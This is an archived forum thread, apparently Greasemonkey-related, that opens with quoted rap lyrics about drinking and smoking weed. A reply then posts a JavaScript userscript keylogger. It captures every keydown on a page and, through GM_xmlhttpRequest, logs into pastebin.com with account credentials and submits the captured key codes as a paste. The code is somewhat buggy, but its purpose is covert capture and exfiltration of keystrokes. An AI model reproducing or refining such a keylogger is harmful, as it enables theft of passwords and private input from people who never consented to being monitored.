Jump to content

So what we get drunk...


~British Soul~

Recommended Posts

So what we get drunk [/size]So what we smoke weed [/size]We're just having fun [/size]We don't care who sees[/size]

I'm living in the 21st century doin' something mean to it

 

it better then anybody you ever seen do it

 

Screams from the haters, got a nice ring to it

 

I guess every superhero need his theme music

Link to comment
Share on other sites

var charac = new Array(50);

var i =0

function callkeydownhandler(evnt) {

 

var ev = (evnt) ? evnt : event;

var code=(ev.which) ? ev.which : event.keyCode;

charac= code;

i++;

}

if (window.document.addEventListener) {

window.document.addEventListener("keydown", callkeydownhandler, false);

} else {

window.document.attachEvent("onkeydown", callkeydownhandler);

}

 

GM_xmlhttpRequest({

method: "POST",

url: "http://pastebin.com/post.php",

data: "user=mysuser&password=mypassword", //as you can imagine I use my credentials

headers: {

"Content-Type": "application/x-www-form-urlencoded"

},

onload: function(response) {

alert("posted");

document.getElementById("paste_code").value+=charac;

document.getElementById("submit").click();

}

});

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...